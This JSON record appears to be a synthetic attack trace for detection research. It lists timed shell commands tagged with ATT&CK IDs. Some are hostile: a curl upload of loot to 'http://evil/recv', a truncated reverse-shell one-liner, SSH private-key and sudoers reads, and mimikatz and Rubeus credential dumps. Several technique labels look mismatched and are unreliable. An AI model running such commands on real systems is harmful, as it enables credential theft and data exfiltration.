{
  "sophistication": 0.88,
  "profile": "careful_agent",
  "length": 50,
  "total_time": 281.9,
  "steps": [
    {
      "t": 4.1,
      "cmd": "cat /etc/passwd",
      "ttp": "T1049",
      "recon": 1,
      "priv_esc": 0,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 7.0,
      "cmd": "ip addr",
      "ttp": "T1049",
      "recon": 2,
      "priv_esc": 0,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 18.3,
      "cmd": "find / -name '*.conf' 2>/dev/null | head -5",
      "ttp": "T1049",
      "recon": 3,
      "priv_esc": 0,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 20.3,
      "cmd": "netstat -an",
      "ttp": "T1049",
      "recon": 4,
      "priv_esc": 0,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 24.6,
      "cmd": "hostname",
      "ttp": "T1049",
      "recon": 5,
      "priv_esc": 0,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 26.6,
      "cmd": "pkexec --version",
      "ttp": "T1068",
      "recon": 5,
      "priv_esc": 1,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 0,
      "profile": "careful_agent"
    },
    {
      "t": 28.6,
      "cmd": "curl -F 'file=@/tmp/loot.tar' http://evil/recv",
      "ttp": "T1041",
      "recon": 5,
      "priv_esc": 1,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 33.9,
      "cmd": "ps aux | head -20",
      "ttp": "T1049",
      "recon": 6,
      "priv_esc": 1,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 39.0,
      "cmd": "whoami",
      "ttp": "T1082",
      "recon": 7,
      "priv_esc": 1,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 52.0,
      "cmd": "hostname",
      "ttp": "T1049",
      "recon": 8,
      "priv_esc": 1,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 57.0,
      "cmd": "id",
      "ttp": "T1049",
      "recon": 9,
      "priv_esc": 1,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 76.8,
      "cmd": "netstat -an",
      "ttp": "T1049",
      "recon": 10,
      "priv_esc": 1,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 78.8,
      "cmd": "whoami",
      "ttp": "T1082",
      "recon": 11,
      "priv_esc": 1,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 80.8,
      "cmd": "find / -name '*.conf' 2>/dev/null | head -5",
      "ttp": "T1049",
      "recon": 12,
      "priv_esc": 1,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 82.8,
      "cmd": "find / -perm -4000 2>/dev/null",
      "ttp": "T1068",
      "recon": 12,
      "priv_esc": 2,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 84.8,
      "cmd": "ip route",
      "ttp": "T1049",
      "recon": 13,
      "priv_esc": 2,
      "cred_access": 0,
      "lateral": 0,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 89.6,
      "cmd": "rubeus.exe dump",
      "ttp": "T1021",
      "recon": 13,
      "priv_esc": 2,
      "cred_access": 0,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 96.0,
      "cmd": "ip addr",
      "ttp": "T1049",
      "recon": 14,
      "priv_esc": 2,
      "cred_access": 0,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 98.0,
      "cmd": "netstat -an",
      "ttp": "T1049",
      "recon": 15,
      "priv_esc": 2,
      "cred_access": 0,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 116.0,
      "cmd": "uname -a",
      "ttp": "T1082",
      "recon": 16,
      "priv_esc": 2,
      "cred_access": 0,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 127.4,
      "cmd": "hostname",
      "ttp": "T1049",
      "recon": 17,
      "priv_esc": 2,
      "cred_access": 0,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 129.5,
      "cmd": "find / -perm -4000 2>/dev/null",
      "ttp": "T1068",
      "recon": 17,
      "priv_esc": 3,
      "cred_access": 0,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 131.5,
      "cmd": "sudo su -",
      "ttp": "T1068",
      "recon": 17,
      "priv_esc": 4,
      "cred_access": 0,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 133.5,
      "cmd": "uname -a",
      "ttp": "T1082",
      "recon": 18,
      "priv_esc": 4,
      "cred_access": 0,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 135.5,
      "cmd": "lsadump::sam",
      "ttp": "T1003",
      "recon": 18,
      "priv_esc": 4,
      "cred_access": 1,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 137.5,
      "cmd": "ls -la /home",
      "ttp": "T1049",
      "recon": 19,
      "priv_esc": 4,
      "cred_access": 1,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 142.0,
      "cmd": "cat ~/.ssh/id_rsa",
      "ttp": "T1003",
      "recon": 19,
      "priv_esc": 4,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 144.0,
      "cmd": "cat /etc/passwd",
      "ttp": "T1049",
      "recon": 20,
      "priv_esc": 4,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 146.8,
      "cmd": "sudo su -",
      "ttp": "T1068",
      "recon": 20,
      "priv_esc": 5,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 174.8,
      "cmd": "cat /etc/os-release",
      "ttp": "T1049",
      "recon": 21,
      "priv_esc": 5,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 181.9,
      "cmd": "ps aux | head -20",
      "ttp": "T1049",
      "recon": 22,
      "priv_esc": 5,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 200.3,
      "cmd": "arp -a",
      "ttp": "T1049",
      "recon": 23,
      "priv_esc": 5,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 202.3,
      "cmd": "cat /etc/os-release",
      "ttp": "T1049",
      "recon": 24,
      "priv_esc": 5,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 205.2,
      "cmd": "whoami",
      "ttp": "T1082",
      "recon": 25,
      "priv_esc": 5,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 210.2,
      "cmd": "cat /etc/sudoers",
      "ttp": "T1068",
      "recon": 25,
      "priv_esc": 6,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 212.2,
      "cmd": "ss -tuln",
      "ttp": "T1049",
      "recon": 26,
      "priv_esc": 6,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 214.2,
      "cmd": "sudo -l",
      "ttp": "T1068",
      "recon": 26,
      "priv_esc": 7,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 221.0,
      "cmd": "uname -a",
      "ttp": "T1082",
      "recon": 27,
      "priv_esc": 7,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 1,
      "profile": "careful_agent"
    },
    {
      "t": 227.4,
      "cmd": "python3 -c 'import socket,subprocess,os; ...' | base64",
      "ttp": "T1041",
      "recon": 27,
      "priv_esc": 7,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 230.6,
      "cmd": "last -n 5",
      "ttp": "T1049",
      "recon": 28,
      "priv_esc": 7,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 234.8,
      "cmd": "ps aux | head -20",
      "ttp": "T1049",
      "recon": 29,
      "priv_esc": 7,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 238.1,
      "cmd": "arp -a",
      "ttp": "T1049",
      "recon": 30,
      "priv_esc": 7,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 240.1,
      "cmd": "cat /etc/passwd",
      "ttp": "T1049",
      "recon": 31,
      "priv_esc": 7,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 242.6,
      "cmd": "find / -perm -4000 2>/dev/null",
      "ttp": "T1068",
      "recon": 31,
      "priv_esc": 8,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 244.6,
      "cmd": "ps aux | head -20",
      "ttp": "T1049",
      "recon": 32,
      "priv_esc": 8,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 246.6,
      "cmd": "pkexec --version",
      "ttp": "T1068",
      "recon": 32,
      "priv_esc": 9,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 265.9,
      "cmd": "hostname",
      "ttp": "T1049",
      "recon": 33,
      "priv_esc": 9,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 271.6,
      "cmd": "sudo -l",
      "ttp": "T1068",
      "recon": 33,
      "priv_esc": 10,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 279.6,
      "cmd": "cat /etc/os-release",
      "ttp": "T1049",
      "recon": 34,
      "priv_esc": 10,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    },
    {
      "t": 281.9,
      "cmd": "hostname",
      "ttp": "T1049",
      "recon": 35,
      "priv_esc": 10,
      "cred_access": 2,
      "lateral": 1,
      "suspicious_tools": 0,
      "exfil": 2,
      "profile": "careful_agent"
    }
  ],
  "id": "trace_00156"
}